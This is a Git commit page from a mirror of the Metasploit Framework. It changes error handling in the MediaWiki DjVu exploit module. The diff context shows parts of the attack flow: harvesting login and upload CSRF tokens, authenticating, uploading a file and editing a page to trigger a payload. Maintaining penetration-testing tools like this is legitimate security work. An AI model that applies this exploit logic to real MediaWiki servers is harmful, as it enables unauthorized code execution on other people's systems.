infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Better failures and handle unconfigured server

bug/bundler_fix
Meatballs 2014-02-02 16:26:22 +00:00
parent 9fa9402eb2
commit 57f4998568
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
1 changed files with 11 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
modules/exploits/multi/http/mediawiki_djvu.rb
View File

@ -141,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote
wp_login_token = get_token_value(response_html, 'wpLoginToken')
unless wp_login_token
fail_with(Failure::NotFound, "Couldn't find login token. Is URI set correctly?")
fail_with(Failure::UnexpectedReply, "Couldn't find login token. Is URI set correctly?")
else
print_good("Retrieved login CSRF token.")
end
@ -167,7 +167,7 @@ class Metasploit3 < Msf::Exploit::Remote
if login and login.code == 302
print_good("Log in successful.")
else
fail_with(Failure::NotFound, "Failed to log in.")
fail_with(Failure::NoAccess, "Failed to log in.")
end
auth_cookie = login.get_cookies.gsub('mediawikiToken=deleted;','')
@ -188,7 +188,7 @@ class Metasploit3 < Msf::Exploit::Remote
title = get_token_value(upload_file_html, 'title')
unless wp_edit_token
fail_with(Failure::NotFound, "Couldn't find upload token. Is URI set correctly?")
fail_with(Failure::UnexpectedReply, "Couldn't find upload token. Is URI set correctly?")
else
print_good("Retrieved upload CSRF token.")
end
@ -223,7 +223,11 @@ class Metasploit3 < Msf::Exploit::Remote
location = upload.headers['Location']
print_good("File uploaded to #{location}")
else
fail_with(Failure::Unknown, "Failed to upload file.")
if upload.body.include? 'not a permitted file type'
fail_with(Failure::NotVulnerable, "Wiki is not configured for DjVu files.")
else
fail_with(Failure::UnexpectedReply, "Failed to upload file.")
end
end
random_page = rand_text_alpha(8)
@ -239,7 +243,7 @@ class Metasploit3 < Msf::Exploit::Remote
})
unless random_edit and random_edit.code == 200
fail_with(Failure::Unknown, "Failed to open target edit page: #{random_page}.")
fail_with(Failure::NotFound, "Failed to open target edit page: #{random_page}.")
end
random_html = Nokogiri::HTML(random_edit.body)
@ -255,7 +259,7 @@ class Metasploit3 < Msf::Exploit::Remote
if wp_edit_token
print_good("Retrieved edit CSRF token.")
else
fail_with(Failure::Unknown, "Failed to retrieve edit CSRF token.")
fail_with(Failure::UnexpectedReply, "Failed to retrieve edit CSRF token.")
end
edit_mime = Rex::MIME::Message.new
@ -284,7 +288,7 @@ class Metasploit3 < Msf::Exploit::Remote
}, 1)
if edit
print_error("Payload probably failed...")
fail_with(Failure::PayloadFailed, "Server responded to edit request (Not expected).")
end
end